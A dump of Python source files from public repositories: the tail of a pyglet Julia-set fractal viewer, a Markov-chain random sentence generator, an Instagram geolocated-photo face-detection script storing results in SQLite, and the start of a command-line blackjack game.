    as a backward-compatible parameter.
    """
    z_n = z
    for i in range(max_iterations):
        z_n = z_n**2 + c
        if abs(z_n) > 2:
            return i
    return True
def reverse_transform(x, y, x_origin, y_origin, width, screen_size):
    """Map screen-pixel coordinates back to complex-plane coordinates
    for the viewport anchored at (x_origin, y_origin) with the given
    width, rendered across screen_size pixels."""
    real = float(width) * x / screen_size + x_origin
    imag = float(width) * y / screen_size + y_origin
    return [real, imag]
def transform_coordinates(x, y, x_origin, y_origin, width, screen_size):
    """Map complex-plane coordinates into screen-pixel coordinates
    (the inverse of reverse_transform)."""
    px = (x - x_origin) / float(width) * screen_size
    py = (y - y_origin) / float(width) * screen_size
    return [px, py]
def get_julia_set(c, x_origin, y_origin, width, size):
    """Sample a size x size grid of the complex plane and classify each
    point against the Julia set for parameter c.

    c - the c parameter in z = z^2 + c
    x_origin, y_origin - the coordinate of the lower left corner
    width - the width in coordinates of the space
    size - number of pixels wide

    Returns (julia_set, other_points, colors): julia_set and
    other_points are flat [x0, y0, x1, y1, ...] lists of screen
    coordinates; colors holds one RGBA quadruple per other_points entry,
    shading fast escapes blue and slow escapes red.
    """
    x_space = numpy.linspace(x_origin, x_origin+width, size)
    y_space = numpy.linspace(y_origin, y_origin+width, size)
    colors = []
    other_points = []
    julia_set = []
    i = 0
    counter = 0  # NOTE(review): never used; candidate for removal
    for x, y in itertools.product(x_space, y_space):
        transformed = transform_coordinates(x, y, x_origin, y_origin, width, size)
        z = complex(x, y)
        # julia is an external module; judging by how `result` is used
        # below it follows the same contract as the local
        # number_in_julia_set (True = in set, else the escape iteration).
        result = julia.number_in_julia_set(z, c)
        if result == True:
            julia_set.extend(transformed)
        else:
            other_points.extend(transformed)
            #red = int(-0.0255*result**2 + 5.1*result)
            # Map the escape iteration (0..99) linearly onto the red channel.
            red = int(result / 100. * 255)
            blue = 255 - red
            colors.extend([red, 0, blue, 255])
        i += 1
        # Progress report every 5% of the grid (Python 2 print statement).
        if i % int(size**2 * 0.05) == 0:
            print "%.1f%%" % (i / float(size**2) * 100)
    return julia_set, other_points, colors
# --- Module-level scene setup.  These names (size, window, c, world,
# --- click_point, drag_point) are shared with the event handlers below,
# --- so they must not be renamed.
size = 700  # window size in pixels (square)
window = pyglet.window.Window(size, size)
# A few Julia-set parameters to try; c5 is the one actually used.
c = -0.757 + -0.164j
c2 = -0.116 + 0.895j
c3 = -0.01 + 0.651j
c4 = -0.15 + 1.0j
c5 = -0.52 + 0.57j
c = c5
# Initial viewport in the complex plane: lower-left corner and width
# (see get_julia_set's parameter description).
x_origin = 0.0
y_origin = 0.0
width = 0.5
julia_set, other_points, colors = get_julia_set(c, x_origin, y_origin, width, size)
world = World(julia_set, other_points, colors)
world.set_attributes(x_origin, y_origin, width, size)
# Mouse state for the zoom-selection rectangle (None/None = unset).
click_point = Point(None, None)
drag_point = Point(None, None)
@window.event
def on_draw():
    """Render the escaping points (in-set points are simply left as the
    black window background) and, while a drag is in progress, the
    square zoom-selection outline."""
    window.clear()
    pyglet.graphics.draw(len(world.other_points) / 2, pyglet.gl.GL_POINTS,
                         ('v2f', world.other_points),
                         ('c4B', world.colors))
    if click_point.valid() and drag_point.valid():
        dx = drag_point.x - click_point.x
        dy = drag_point.y - click_point.y
        # Keep the selection square: use the larger extent for both sides.
        side = dx if abs(dx) > abs(dy) else dy
        x0, y0 = click_point.x, click_point.y
        corners = [x0, y0,
                   x0 + side, y0,
                   x0 + side, y0 + side,
                   x0, y0 + side]
        pyglet.graphics.draw(4, pyglet.gl.GL_LINE_LOOP,
                             ('v2i', corners),
                             ('c4B', (255, 255, 255, 255) * 4))
@window.event
def on_mouse_motion(x, y, dx, dy):
    """Compute the complex-plane coordinate under the cursor.

    The result is currently discarded; it is kept for the (disabled)
    coordinate read-out.
    """
    real, imaginary = reverse_transform(
        x, y, world.x_origin, world.y_origin, world.width, world.size)
@window.event
def on_mouse_press(x, y, button, modifiers):
    """Record the pixel where a zoom selection begins."""
    click_point.x, click_point.y = x, y
@window.event
def on_mouse_drag(x, y, dx, dy, buttons, modifiers):
    """Track the moving corner of the zoom selection while dragging."""
    drag_point.x, drag_point.y = x, y
@window.event
def on_mouse_release(x, y, button, modifiers):
    """Zoom: recompute the fractal for the square region selected by
    the click/drag points, then reset the mouse state."""
    # NOTE(review): a click with no preceding drag leaves drag_point
    # unset (None) and the subtractions below would raise -- confirm a
    # drag event always precedes release in practice.
    width1 = drag_point.x - click_point.x
    width2 = drag_point.y - click_point.y
    # Keep the zoom box square by using the larger drag extent.
    if abs(width1) > abs(width2):
        box_width = width1
    else:
        box_width = width2
    # New viewport origin in the complex plane = where the drag started.
    new_x_origin, new_y_origin = reverse_transform(click_point.x, click_point.y, world.x_origin, world.y_origin, world.width, world.size)
    # Convert the pixel box width into a complex-plane width.
    new_width = box_width * (world.width / world.size)
    julia_set, other_points, colors = get_julia_set(c, new_x_origin, new_y_origin, new_width, world.size)
    world.julia_set = julia_set
    world.other_points = other_points
    world.colors = colors
    # NOTE(review): uses the module-level `size` rather than world.size;
    # the two are always equal here, but world.size would be safer.
    world.set_attributes(new_x_origin, new_y_origin, new_width, size)
    print new_x_origin, new_y_origin
    print new_width
    click_point.clear()
    drag_point.clear()
# Start the pyglet event loop (blocks until the window is closed).
pyglet.app.run()
"repo_name": "asgordon96/Julia-Set",
"path": "fractals_new.py",
"copies": "1",
"size": "5368",
"license": "mit",
"hash": -3536276131188730400,
"line_mean": 28.8277777778,
"line_max": 137,
"alpha_frac": 0.5806631893,
"autogenerated": false,
"ratio": 3.003917179630666,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4084580368930666,
"avg_score": null,
"num_lines": null
} |
#A program to generate a series of random sentences from a text file using Markov chains
#by Grace Newman, written for CS 111 (Intro to CS), completed March 1, 2013
from random import randrange
class sentenceGenerator:
    """Builds random sentences from a text via a first-order Markov chain.

    startWords holds the distinct capitalised words usable as sentence
    openers; connections maps each word to the list of words that
    followed it in the source text (with repeats, so frequency weights
    the random choice).
    """

    def __init__(self):
        # Empty vocabulary; makeData() populates both structures.
        self.startWords = []
        self.connections = {}

    def makeData(self, filename):
        """Read the whole file and build the start-word list and the
        word-to-followers table."""
        # `with` closes the file even on error (and avoids shadowing the
        # builtin `file`, as the original did).
        with open(filename) as source:
            words = source.read().split()
        self.makeStarts(words)
        self.makeConnect(words)

    def makeStarts(self, wordlist):
        """Collect each distinct word beginning with an ASCII capital
        letter (ordinals 65-90, i.e. A-Z) as a potential opener."""
        for word in wordlist:
            if 65 <= ord(word[0]) <= 90 and word not in self.startWords:
                self.startWords.append(word)

    def makeConnect(self, wordlist):
        """Record, for every word, each word that follows it.

        Fix: dict.has_key() is deprecated and removed in Python 3; the
        `in` operator is the equivalent (and Python 2-identical) test.
        """
        for x in range(len(wordlist) - 1):
            word = wordlist[x]
            entry = wordlist[x + 1]
            if word in self.connections:
                self.connections[word].append(entry)
            else:
                self.connections[word] = [entry]

    def randomSentence(self):
        """Generate one sentence: start from a random capitalised word
        and follow randomly chosen recorded transitions.

        The chain keeps extending while the latest word does not end in
        . ! or ? (soft cap around 50 words), and always extends past 4
        words.  NOTE(review): raises KeyError if the chain reaches a
        word that never appeared with a successor (e.g. the file's very
        last word) -- behaviour inherited from the original.
        """
        punctuation = [".", "!", "?"]
        sentence = []
        start = self.startWords[randrange(len(self.startWords))]
        index = randrange(len(self.connections[start]))
        follower = self.connections[start][index]
        sentence.append(start)
        sentence.append(follower)
        # Precedence note: (unterminated and len <= 50) or len <= 4.
        while follower[-1] not in punctuation and len(sentence) <= 50 or len(sentence) <= 4:
            choices = self.connections[follower]
            follower = choices[randrange(len(choices))]
            sentence.append(follower)
        return " ".join(sentence)
# For each new call, print a sentence and query the user for the next
# action ('g' = another sentence, 'n' = new file, 'q' = quit).
# (Python 2: print statement and raw_input.)
def newCall(sentence): #for each new call, print a sentence and query the user
    print sentence.randomSentence()
    command=raw_input("Type 'g' for another sentence, 'n' to switch to a new file, and 'q' to quit: ")
    return command
def main():
    """Interactive driver: build a generator from a user-named file,
    then keep serving sentences or switching files until 'q' is
    entered.  (Python 2: raw_input.)"""
    prompt = "Please input a .txt file to generate random sentences from: "
    source = raw_input(prompt)
    currentInstance = sentenceGenerator()
    currentInstance.makeData(source)
    command = newCall(currentInstance)
    while command != "q":
        # Deliberately two separate ifs, not elif: a 'g' round may
        # return 'n', which is then handled within the same pass.
        if command == "g":
            command = newCall(currentInstance)
        if command == "n":
            source = raw_input(prompt)
            currentInstance = sentenceGenerator()
            currentInstance.makeData(source)
            command = newCall(currentInstance)


main()
| {
"repo_name": "ganewman42/CodeSamples",
"path": "CarletonCourses/RandomSentence.py",
"copies": "1",
"size": "3832",
"license": "mit",
"hash": -8370381973086177000,
"line_mean": 52.2222222222,
"line_max": 204,
"alpha_frac": 0.6787578288,
"autogenerated": false,
"ratio": 4.215621562156215,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5394379390956215,
"avg_score": null,
"num_lines": null
} |
"""A program to
1. Make an api call to instragram to get photos from a geographic location
2. Attempt to detect faces in the images
3. Store the metadata in sqlite3
Example call from command line is:
python face.py -l 40.7359 -g -73.9903086 -m [CURRENT TIMESTAMP] -t [TIME STAMP OF HOW FAR BACK YOU WANT TO GO] -c [YOUR_CLIENT_ID]
Currently it will pull 10 images for each ten minute block between -m and -t.
You can play with those settings by changing:
self.num_photos = 10
in the API_call() class
or
changing the 600 seconds to something else in:
return new_max_timestamp - 600
in the def get_new_max_timestamp
"""
import numpy as np
import pandas as pd
import cv2
import os
import json
from PIL import Image
import urllib2
import cStringIO
import time
import sys
import getopt
import sqlite3
from socket import error as SocketError
# for the cascades to work you need install CV2 and point these to your local dir. Install cv2 by finding the right instructions for your computer's os http://docs.opencv.org/doc/tutorials/introduction/table_of_content_introduction/table_of_content_introduction.html
FACE_CASCADE = cv2.CascadeClassifier('/Users/andrewjtimmons/anaconda/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')
EYE_CASCADE = cv2.CascadeClassifier('/Users/andrewjtimmons/anaconda/share/OpenCV/haarcascades/haarcascade_eye.xml')
MOUTH_CASCADE = cv2.CascadeClassifier('/Users/andrewjtimmons/anaconda/share/OpenCV/haarcascades/haarcascade_mcs_mouth.xml')
SMILE_CASCADE = cv2.CascadeClassifier('/Users/andrewjtimmons/anaconda/share/OpenCV/haarcascades/haarcascade_smile.xml')
class API_call():
""" Makes api calls to instragram's media search endpoint"""
def __init__(self, lat, lng, max_timestamp, client_id):
self.lat = lat
self.lng = lng
self.max_timestamp = max_timestamp
self.client_id = client_id
self.num_photos = 10
self.api_endpoint = "https://api.instagram.com/v1/media/search?lat=%s&lng=%s&max_timestamp=%s&distance=5000&client_id=%s&count=%s" % (self.lat, self.lng, self.max_timestamp, self.client_id, self.num_photos)
self.response = urllib2.urlopen(self.api_endpoint)
self.data = json.load(self.response)
class Img():
""" Object created for each image
Input Variables
entry: the api call data for a specific image
api_call_lat: the latitude of where the api call was centered
api_call_lng: the longitude of where the api call was centered
Class Variables:
self.url: url of image
self.low_resolution_url: low res url of image
self.thumbnail_url: thumbnail url of image
self.users_in_photo: users tagged in the photo
self.tags: hashtages on the photo
self.lat: lat of the photo
self.lng: lng of the photo
self.filter: filter applied to photo
self.created_time: timestamp of the photo creation
self.id: instagram's id of the photo
self.link: link to the instagram front end web interface of the photo
self.username: owner of photo's username
self.color_image: actual color image represented in numpy array
self.grayscale_image: actual color image represented in numpy array
self.faces_rois: numpy array of grayscale image that might be a face
self.faces: collection of four points that bound a potential face in a box that is generated from the haar cascade.
self.num_faces: len(self.faces_rois)
self.caption: caption on photo by user
self.api_call_lat: the latitude of where the api call was centered
self.api_call_lng: the longitude of where the api call was centered
"""
def __init__(self, entry, api_call_lat, api_call_lng):
self.url = entry['images']['standard_resolution']['url']
self.low_resolution_url = entry['images']['low_resolution']['url']
self.thumbnail_url = entry['images']['thumbnail']['url']
if entry['users_in_photo'] != []:
self.users_in_photo = entry['users_in_photo']
else:
self.users_in_photo = None
self.tags = entry['tags']
self.lat = entry['location']['latitude']
self.lng = entry['location']['longitude']
self.filter = entry['filter']
self.created_time = entry['created_time']
self.id = entry['id']
self.link = entry['link']
self.username = entry['user']['username']
self.color_image = self._create_opencv_image_from_url()
self.grayscale_image = self._create_grayscale_image()
self.faces_rois, self.faces = self._detect_faces()
self.num_faces = len(self.faces_rois)
try:
self.caption = entry['caption']['text']
except TypeError:
self.caption = ""
self.api_call_lat = api_call_lat
self.api_call_lng = api_call_lng
def _create_opencv_image_from_url(self, cv2_img_flag = 1):
""" Get image from URL and convert to an openCV image."""
request = urllib2.urlopen(self.url)
img_array = np.asarray(bytearray(request.read()), dtype=np.uint8)
return cv2.imdecode(img_array, cv2_img_flag)
def _create_grayscale_image(self):
""" Turn color image into grayscale."""
return cv2.cvtColor(self.color_image, cv2.COLOR_BGR2GRAY)
def _detect_faces(self):
""" Detect faces in the image. Returns an empty list if no faces. """
faces = FACE_CASCADE.detectMultiScale(self.grayscale_image, scaleFactor = 1.05, minNeighbors = 3)
faces_rois = []
for (x,y,w,h) in faces:
self._draw_rectangle(self.color_image, (x,y), (x+w,y+h), (255,0,0))
faces_rois.append(self.grayscale_image[y:y+h, x:x+w])
return faces_rois, faces
def _draw_rectangle(self, image, pt1, pt2, color, thickness = 2):
""" Draw rectangle around a region of interests with a arbitrary color. """
cv2.rectangle(image, pt1, pt2, color, thickness)
def show_color_image(self):
""" Display image on screen and close on key press. """
cv2.imshow('img',self.color_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
def show_grayscale_image(self):
""" Display image on screen and close on key press. """
cv2.imshow('img',self.grayscale_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
def has_faces(self):
""" Returns True if more than one face is detected. """
if len(self.faces_rois) > 0:
return True
return False
class Face():
""" Object for a detected face region of interest in an img object.
Each image has 0 or more faces.
Input variables
url: url of original image
color_image: the color image from the url
grayscale_image: the grayscale image from the url
face_roi: numpy array of grayscale image that might be a face
face_xywh: the four points that bound a this specific potential face in a box that is generated from the haar cascade. Comes from self.faces in Img class.
Class variables:
self.eyes_rois: numpy array of grayscale image that might be eyes
self.eyes_xywh_relative: position of eyes relative to face_roi
self.eyes_xywh_absolute: position of eyes in relation to the whole image
self.roi_gray_below_eyes: area below the eyes to look for a mouth in grayscale
self.roi_color_below_eyes: area below the eyes to look for a mouth in color
self.mouth_rois: numpy array of grayscale image that might be a mouth
self.mouth_xywh_relative: position of mouth relative to face_roi
self.mouth_xywh_absolute: position of mouth in relation to the whole image
self.smile_rois: numpy array of grayscale image that might be a smile
self.smile_xywh_relative: position of smile relative to face_roi
self.smile_xywh_absolute: position of smile in relation to the whole image
"""
def __init__(self, url, color_image, grayscale_image, face_roi, face_xywh):
self.url = url
self.color_image = color_image
self.grayscale_image = grayscale_image
self.face_roi = face_roi
self.face_xywh = face_xywh
self.eyes_rois, self.eyes_xywh_relative, self.eyes_xywh_absolute = self._detect_eyes()
if self.has_two_eyes():
self.roi_gray_below_eyes, self.roi_color_below_eyes = self._create_roi_below_eyes()
self.mouth_rois, self.mouth_xywh_relative, self.mouth_xywh_absolute = self._detect_mouths()
self.smile_rois, self.smile_xywh_relative, self.smile_xywh_absolute = self._detect_smiles()
def _detect_eyes(self):
""" Detect eyes in the image. Returns an empty list if no eyes. """
eyes_xywh_relative = EYE_CASCADE.detectMultiScale(self.face_roi, scaleFactor = 1.05, minNeighbors = 3)
eyes_rois = []
eyes_xywh_absolute = []
for x, y, w, h in eyes_xywh_relative:
self._draw_rectangle(self.face_roi, (x,y), (x+w,y+h), (0,255,0))
x1, x2, y1, y2 = self._eye_math(x,y,w,h)
eyes_rois.append(self.color_image[y1:y2, x1:x2])
eyes_xywh_absolute.append([x1, x2, y1, y2])
return eyes_rois, eyes_xywh_relative, eyes_xywh_absolute
def _create_roi_below_eyes(self):
""" Takes the face roi and limits it to the region below the eyes. This will let
the mouth cascades just search in that region instead of looking at the whole face.
Get x,y coords with width and height. """
x_face, y_face, w_face, h_face = self.face_xywh
y_eyes = y_face + self.eyes_xywh_relative[0][1] + int(self.eyes_xywh_relative[0][3]*1.5)
face_bottom = h_face - self.eyes_xywh_relative[0][1] - int(self.eyes_xywh_relative[0][3]*1.5)
roi_gray_below_eyes = self.grayscale_image[y_eyes:y_eyes+face_bottom, x_face:x_face+w_face]
roi_color_below_eyes = self.color_image[y_eyes:y_eyes+face_bottom, x_face:x_face+w_face]
return roi_gray_below_eyes, roi_color_below_eyes
def _detect_mouths(self):
""" Detect mouth in the image. Returns an empty list if no mouth. """
mouth_xywh_relative = MOUTH_CASCADE.detectMultiScale(self.roi_gray_below_eyes, scaleFactor = 1.05, minNeighbors = 3)
mouth_rois = []
mouth_xywh_absolute = []
for x,y,w,h in mouth_xywh_relative:
self._draw_rectangle(self.roi_color_below_eyes, (x,y), (x+w,y+h), (0,0,0))
x1, x2, y1, y2 = self._mouth_math(x,y,w,h)
mouth_rois.append(self.color_image[y1:y2, x1:x2])
mouth_xywh_absolute.append([x1, x2, y1, y2])
return mouth_rois, mouth_xywh_relative, mouth_xywh_absolute
def _detect_smiles(self):
""" Detect smile in the image. Returns an empty list if no mouth. """
smile_xywh_relative = SMILE_CASCADE.detectMultiScale(self.roi_gray_below_eyes, scaleFactor = 1.05, minNeighbors = 3)
smile_rois = []
smile_xywh_absolute = []
for x, y, w, h in smile_xywh_relative:
self._draw_rectangle(self.roi_color_below_eyes, (x,y), (x+w,y+h), (255,255,255))
x1, x2, y1, y2 = self._mouth_math(x,y,w,h)
smile_rois.append(self.color_image[y1:y2, x1:x2])
smile_xywh_absolute.append([x1, x2, y1, y2])
return smile_rois, smile_xywh_relative, smile_xywh_absolute
def _eye_math(self, x, y, w, h):
""" Returns points from the eye roi that are in context of the whole image, not just the eye roi """
x1 = self.face_xywh[0]+x
x2 = self.face_xywh[0]+x+w
y1 = self.face_xywh[1]+y
y2 = self.face_xywh[1]+y+h
return x1, x2, y1, y2
def _mouth_math(self, x, y, w, h):
""" Returns points from the mouth roi that are in context of the whole image, not just the mouth roi """
x1 = self.face_xywh[0]+x
x2 = self.face_xywh[0]+x+w
y1 = self.face_xywh[1]+self.eyes_xywh_relative[0][1]+int(self.eyes_xywh_relative[0][3]*1.5)+y
y2 = self.face_xywh[1]+self.eyes_xywh_relative[0][1]+int(self.eyes_xywh_relative[0][3]*1.5)+y+h
return x1, x2, y1, y2
def _draw_rectangle(self, image, pt1, pt2, color, thickness = 2):
""" Draw rectangle around a region of interests with a arbitrary color. """
cv2.rectangle(image, pt1, pt2, color, thickness)
def show_color_image(self):
""" Display image on screen and close on key press. """
cv2.imshow('img',self.color_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
def show_grayscale_image(self):
""" Display image on screen and close on key press. """
cv2.imshow('img',self.grayscale_image)
cv2.waitKey(0)
cv2.destroyAllWindows()
def has_two_eyes(self):
""" Returns True if two eyes are detected. """
if len(self.eyes_rois) == 2:
return True
return False
def has_one_mouth(self):
""" Returns true if only one mouth. """
if len(self.mouth_rois) == 1:
return True
return False
def has_zero_or_one_smile(self):
""" Returns true if it has zero or one smiles. """
if len(self.smile_rois) <= 1:
return True
return False
def main(argv):
"""The main function that strings together the classes and the non class methods.
It does the following:
1. Make an api call to instragram to get photos from a geographic location
2. Attempt to detect faces in the images
3. Store the metadata in sqlite3
Example call from command line is:
python face.py -l 40.7359 -g -73.9903086 -m 1424235599 -t 1424149199 -c [YOUR_CLIENT_ID]
Input variables passed via flags
api_call_lat: the latitude of where the api call was centered
api_call_lng: the latitude of where the api call was centered
max_timestamp: The largest possible timestamp you want an image to have. (note instagram api does not always respect this precisely, but it is usually pretty close)
min_timestamp: The smallest possible timestamp you want an image to have. (note instagram api does not always respect this precisely, but it is usually pretty close)
client_id: Your instagram api client id
This function has time.sleep() in a few places since you have to call the images from the web. The api only gives you the metadata and we dont want to slam their servers.
"""
api_call_lat, api_call_lng, max_timestamp, min_timestamp, client_id = parse_cmd_args(argv)
calls_made = 0
face_count = 0
t1 = time.time()
conn, cursor = db_connect()
already_in_db = cursor.execute("SELECT instagram_id from images").fetchall()
processed_images = set([str(x[0]) for x in already_in_db])
socket_error_ids = []
while max_timestamp > min_timestamp:
images = get_image_entries_from_api(api_call_lat, api_call_lng, max_timestamp, client_id)
for entry in images:
try:
img = Img(entry, api_call_lat, api_call_lng)
if is_new_image(img.id, processed_images):
print img.url + "\n" + img.created_time
image_table_id = insert_in_image_db_and_return_id(img, cursor)
for possible_face, face_xywh in zip(img.faces_rois, img.faces):
face = Face(img.url, img.color_image, img.grayscale_image, possible_face, face_xywh)
if face.has_two_eyes() and face.has_one_mouth() and face.has_zero_or_one_smile():
print "face_found"
insert_in_face_db(face, image_table_id, img.url, cursor)
face_count += 1
conn.commit()
print "commited to db"
save_image_to_disk(img)
except cv2.error:
continue
except SocketError as E:
print "socket error, connection reset by peer, pausing for 3 minutes"
time.sleep(180)
socket_error_ids.append(entry['id'])
time.sleep(1)
max_timestamp = get_new_max_timestamp(max_timestamp, img.created_time)
calls_made += 1
print str(face_count) + " faces found through loop " + str(calls_made)
print "pausing for 3 seconds"
time.sleep(3)
conn.close()
print 'time taken is ' + str(time.time() - t1)
print "the following images failed due to socket hangups"
print socket_error_ids
def parse_cmd_args(argv):
""" Turns command line flags into variables """
try:
opts, args = getopt.getopt(argv,"hl:g:m:t:c:",["lat=", "lng=", "max_timestamp=", "min_timestamp=", "client_id="])
except getopt.GetoptError:
print 'face.py face.py "-l --lat, -g --lng, -m --max_timestamp, -c --client_id="'
sys.exit(2)
for opt, arg in opts:
if opt == '-h':
print 'face.py "-l --lat, -g --lng, -m --max_timestamp, -c --client_id="'
sys.exit()
elif opt in ("-l", "--lat"):
api_call_lat = float(arg)
elif opt in ("-g", "--lng"):
api_call_lng = float(arg)
elif opt in ("-m", "--max_timestamp"):
max_timestamp = int(arg)
elif opt in ("-t", "--min_timestamp"):
min_timestamp = int(arg)
elif opt in ("-c", "--client_id"):
client_id = str(arg)
else:
assert False, "unhandled option"
return api_call_lat, api_call_lng, max_timestamp, min_timestamp, client_id
def db_connect():
""" Connect to sqlite db. """
conn = sqlite3.connect('face.db')
cursor = conn.cursor()
return conn, cursor
def get_image_entries_from_api(api_call_lat, api_call_lng, max_timestamp, client_id):
""" Gets images from the api """
response = API_call(lat = api_call_lat, lng = api_call_lng, max_timestamp = max_timestamp, client_id = client_id)
images = [entry for entry in response.data['data'] if entry['type'] == 'image']
return images
def insert_in_image_db_and_return_id(img, cursor):
    """Insert one image row and return its primary key.

    cv2 haar cascades return either a numpy.ndarray or an empty tuple
    for img.faces, so the empty tuple is normalised to a plain list
    before JSON encoding (all rows then share one datatype).  The
    returned rowid is stored with each face row for joins later.
    """
    faces_for_db = img.faces.tolist() if img.faces != () else []
    row = (
        img.url,
        img.low_resolution_url,
        img.thumbnail_url,
        json.dumps(img.users_in_photo),
        json.dumps(img.tags),
        img.lat,
        img.lng,
        img.filter,
        img.created_time,
        img.id,
        img.link,
        img.username,
        json.dumps(faces_for_db),
        img.caption,
        img.api_call_lat,
        img.api_call_lng,
    )
    cursor.execute("INSERT INTO images VALUES (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)", row)
    return cursor.lastrowid
def insert_in_face_db(face, image_table_id, url, cursor):
    """Insert one detected face row, linked to its image row.

    *_relative attributes are numpy arrays; *_absolute attributes are
    plain python lists.  The absolute ones should not need conversion
    but serialising them directly failed with
    "TypeError: 351 is not JSON serializable" (though it works in a
    terminal), so they are round-tripped through numpy and back to a
    list.  Hackey workaround for now.
    """
    # Round-trip the absolute coordinates through numpy (see docstring).
    eyes_abs = np.asarray(face.eyes_xywh_absolute).tolist()
    mouth_abs = np.asarray(face.mouth_xywh_absolute).tolist()
    smile_abs = np.asarray(face.smile_xywh_absolute).tolist()
    # An empty tuple means no smile detection result.
    smile_rel = face.smile_xywh_relative.tolist() if face.smile_xywh_relative != () else []
    row = [
        image_table_id,
        url,
        json.dumps(face.face_xywh.tolist()),
        json.dumps(face.eyes_xywh_relative.tolist()),
        json.dumps(eyes_abs),
        json.dumps(face.mouth_xywh_relative.tolist()),
        json.dumps(mouth_abs),
        json.dumps(smile_rel),
        json.dumps(smile_abs),
    ]
    cursor.execute("INSERT INTO faces VALUES (?,?,?,?,?,?,?,?,?)", row)
def is_new_image(image_id, processed_images):
    """ Checks if image has already been processed since instagram api sometimes
    does not respect max_timestamp. See
    http://stackoverflow.com/questions/23792774/instagram-api-media-search-endpoint-not-respecting-max-timestamp-parameter
    and http://stackoverflow.com/questions/25155620/instagram-api-media-search-max-timestamp-issue

    Returns False for an already-seen id; otherwise records the id in
    processed_images (a set, mutated in place) and returns True.
    """
    if image_id in processed_images:
        print 'seen image_id %s before, skipping it' % image_id
        return False
    # Side effect: remember this id so later calls can skip duplicates.
    processed_images.add(image_id)
    return True
def save_image_to_disk(img):
    """Save the colour and grayscale versions of the image to local storage."""
    targets = (("images/", img.color_image),
               ("grayscale_images/", img.grayscale_image))
    for folder, pixels in targets:
        cv2.imwrite(folder + img.id + ".jpg", pixels)
def get_new_max_timestamp(last_max_timestamp, current_image_timestamp):
    """Return the earlier of the two timestamps, stepped back 600 seconds.

    The instagram API does not always respect max_timestamp; without the
    600-second step-back the loop could stall on photos whose timestamps
    all exceed the requested cutoff.
    """
    if last_max_timestamp < current_image_timestamp:
        earliest = last_max_timestamp
    else:
        earliest = current_image_timestamp
    return earliest - 600
if __name__ == '__main__':
main(sys.argv[1:]) | {
"repo_name": "andrewjtimmons/selfieexpression",
"path": "face.py",
"copies": "1",
"size": "20276",
"license": "mit",
"hash": 8533627074403147000,
"line_mean": 40.8082474227,
"line_max": 267,
"alpha_frac": 0.6820378773,
"autogenerated": false,
"ratio": 3.170602032838155,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4352639910138155,
"avg_score": null,
"num_lines": null
} |
## A program to play Blackjack
## By BlueHat GURU
## Written in Python 3.4.1
# Assumption: players already know how to play blackjack, and do not require educating.
# This is just defining a deck of cards, returning it as a list in numerical_suit order.
card_values = ('ace', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'jack', 'queen', 'king')
deck_suits = ('_clubs', '_diamonds', '_hearts', '_spades')
deckofcards = [ value+suit for value in card_values for suit in deck_suits]
# Build a dictionary mapping the first three letters of each card value
# (the prefix handvalue() keys on) to its blackjack worth; ten and all
# face cards are capped at 10, aces start at 1 (promotion happens in
# handvalue()).
card_value_dictionary = {}
card_value_counter = 0
for card in card_values:
    card_value_counter = card_value_counter + 1
    if card_value_counter > 10:
        card_value_counter = 10
    card_value_dictionary[card[:3]] = card_value_counter
# Packages blackjack won't run without.
import random
import math
# Ejection message printed by every dialog when the player keeps giving
# unusable answers.
failuretocomply = """
Local laws forbid us from taking money from people
who can't understand our instructions.
I'm going to have to ask you to leave."""
def playgame(playerchips=100, quittracker = False):
    """Top-level game loop.

    Sets up the table (shoe size chosen by the player, double-shuffled
    shoe), then plays one hand at a time until the player runs out of
    chips, chooses to quit, or is ejected (quittracker set by a dialog).
    """
    #loops until the player looses all chips or quits
    print('Welcome to our casino. You have ' + str(playerchips) + ' chips to play with.')
    numberdecks, quittracker = get_number_decks(quittracker)
    tabledeck= bigdeckmaker(numberdecks)
    random.shuffle(tabledeck)
    random.shuffle(tabledeck) # seems to work better with two
    useddeck = []
    while (playerchips > 0 and quittracker == False):
        playerbet, quittracker = get_number_bet(playerchips, quittracker)
        if quittracker: # make sure the player just leaves if they give a bad answer
            break
        # NOTE(review): local name bet_result shadows the bet_result()
        # function -- harmless here, but confusing.
        bet_result, tabledeck, useddeck, quittracker = playhand(playerbet, playerchips, tabledeck, useddeck, quittracker)
        playerchips = playerchips + bet_result
        print('You now have ' + str(playerchips) + ' chips.')
        if quittracker == False:
            quittracker = quit_query()
    print('You leave the casino with ' + str(playerchips) + ' chips.')
def playhand(bet_valueph, playerchipsph, deckatthetable, usedcards, quittrackerph):
    """Play one hand: deal, let the player act, then the dealer draws to 17.

    Returns (signed chip change for the bet, table deck, used-card pile,
    quit flag).  All decks are python lists mutated in place by dealto().
    """
    #function to actually play through a hand
    playerhandph=[]
    dealerhandph=[]
    playerhandvalue = 0
    dealerhandvalue = 0
    playerstand = False
    # Initial deal: player, dealer, player (dealer shows one card).
    deckatthetable, playerhandph, usedcards = dealto(deckatthetable, playerhandph, usedcards)
    handstatement(playerhandph, 'Your')
    deckatthetable, dealerhandph, usedcards = dealto(deckatthetable, dealerhandph, usedcards)
    handstatement(dealerhandph, 'The dealer\'s')
    deckatthetable, playerhandph, usedcards = dealto(deckatthetable, playerhandph, usedcards)
    handstatement(playerhandph, 'Your')
    # Player keeps acting until they stand, bust, or reach 21.
    while ( (playerhandvalue < 21) and (playerstand != True)):
        bet_valueph, playerstand, playerhandph, deckatthetable, usedcards, quittrackerph = \
        playerdecision_dialog(bet_valueph, playerchipsph, playerstand, playerhandph, deckatthetable, usedcards, quittrackerph)
        if quittrackerph: # make sure the player just leaves if they give a bad answer
            break
        playerhandvalue = handvalue(playerhandph)
        handstatement(playerhandph, 'Your')
    # Dealer must draw to 17 (house rule), unless the player was ejected.
    while ( dealerhandvalue < 17) and (quittrackerph == False):
        deckatthetable, dealerhandph, usedcards = dealto(deckatthetable, dealerhandph, usedcards)
        dealerhandvalue = handvalue(dealerhandph)
        handstatement(dealerhandph, 'The dealer\'s')
    #int(bet_valueph)
    bet_resultph = bet_result(bet_valueph, playerhandph, dealerhandph)
    # Retire both hands to the used pile.
    usedcards = usedcards + playerhandph + dealerhandph
    return bet_resultph, deckatthetable, usedcards, quittrackerph
